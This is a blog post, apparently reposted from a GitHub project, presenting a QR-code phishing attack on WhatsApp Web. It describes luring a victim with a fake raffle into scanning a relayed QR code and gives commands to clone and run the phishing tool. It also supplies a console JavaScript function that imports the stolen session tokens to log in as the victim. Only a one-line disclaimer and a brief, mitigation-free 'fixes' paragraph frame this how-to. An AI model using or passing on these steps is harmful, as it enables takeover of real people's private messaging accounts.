How to Hijack WhatsApp account using WhatsApp web – An advanced phishing attack revealed !

The basic protocol of WhatsApp, the login process:-

Whatsapp login flow

When starting the app for the very first time the user has to enter their phone number. A verification token is then send to this number by SMS or call. After that code has been entered into the app, the authentication token is saved on the device and the user is logged in.

When the user gets a new device the process needs to be repeated for this device and the old one will be de-authorized. Whatsapp does not store old messages on their servers, so previous messages won’t be transferred to the new device.

Of course the process is a bit more complex but this simplification is suitable for the purpose of this article.

This convenience comes with the cost of being vulnerable to new attacks like cell network hacking that can be used get access to a phone number. It is also required that the user trusts their mobile provider because they have full access over the number and could easily take over an account.

The View of an attacker :-

In 2015 WhatsApp started thier famous service called WhatsApp web


To use it, a browser has to be peered with the phone, and the phone remains in command. Here a brief overview of the flow:

Whatsapp Web flow

An Actual Attack:-

It’s pretty simple: the attacker only needs to trick the user into scanning an “malicious” code to authorize the attacker’s browser. This will give them full access to the Whatsapp account of the victim. A simple online raffle, in which the victim is asked to scan a code to enter, could pose as a lure.

Attack flow

Note that we need Firefox latest version of the desktop browser only for Windows, Mac, Linux, FreeBSD, etc.

So how does it work?

The program uses node.js and socket.io for the website and selenium, a tool for scripting browsers, to communicate with the Whatsapp web client.

The program starts a http and a socket.io server. If a new client connects to socket.io the application will make a request to a selenium instance to start a new browser and connect to web.whatsapp.com. It will fetch the QR code data and send it to the client via the websocket connection. The client javascript then shows the QR code to the user.

If the QR code gets scanned Whatsapp will authenticate the selenium controlled browser and store some tokens in the localStorage and document.cookie. We extract that data and save it into a text file. It will look like so:

      "WAWamDimensionCache":"{\"AppVersion\":\"0.1.4391\",\"BrowserVersion\":\"Firefox 39.0\",\"DeviceName\":\"Linux x86_64\",\"WebcEnv\":0}",

You can than import these tokens into your browser and log in as the person who scanned the QR code.

Next Steps:-

  • Download the selenium standalone server jar file and install Firefox if you don’t already have it.
  • Type the following into your terminal
java -jar selenium-server.jar
# new terminal
git clone https://github.com/Mawalu/whatsapp-phishing.git
cd whatsapp-phishing
npm install
node index.js
  • Open your browser and go to http://localhost:8080
  • Start Whatsapp on your smartphone, go to Menu > Whatsapp Web and scan the QR code from your browser.
  • Copy the content from the newly created secrets file
  • Open web.whatsapp.com. (Watch out that you are not already logged in, maybe use incognito mode)
  • Open your developer console
  • Enter the following code:
> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(';'); token.c.forEach(function(cookie) {document.cookie = cookie; });}
> login(t)
  • Reload the page
  • You should be logged in as the person who scanned the QR code


Whatsapp messages are meant to be private. Just because the NSA reads everything it doesn’t mean you should do as well! Everything in this repo is for education purpose only and I am not responsible if you use it otherwise.

Possible fixes:-

There are no quick fixes to avoid such an attack, except a complete revamp of the authentication procedure. I think while Whatsapp might have been aware the possibility when they developed their web client, they might have considered it no big issue.

[via:- Github mawalabs.de]


Leave a Reply

Your email address will not be published. Required fields are marked *